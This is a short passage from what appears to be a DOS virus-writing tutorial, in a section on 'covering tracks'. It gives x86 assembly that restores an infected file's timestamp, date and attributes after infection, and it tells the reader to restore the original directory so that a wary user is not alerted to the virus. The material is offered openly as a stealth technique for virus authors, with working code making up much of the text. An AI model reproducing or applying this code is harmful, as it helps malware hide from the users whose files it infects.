Cover your tracks
This step, though simple to do, is too easily neglected. It is extremely important, as a wary user will be alerted to the presence of a virus by any unnecessary updates to a file. In its simplest form, it involves the restoration of file attributes, time and date. This is done with the following:
mov ax, 5701h ; Set file time/date
mov dx, word ptr [bp+f_date] ; DX = date
mov cx, word ptr [bp+f_time] ; CX = time
int 21h
mov ah, 3eh ; Handle close file
int 21h
mov ax, 4301h ; Set attributes
lea dx, [bp+offset DTA + 1Eh] ; Filename still in DTA
xor ch, ch
mov cl, byte ptr [bp+f_attrib] ; Attribute in CX
int 21h
Remember also to restore the directory back to the original one if it changed during the run of the virus.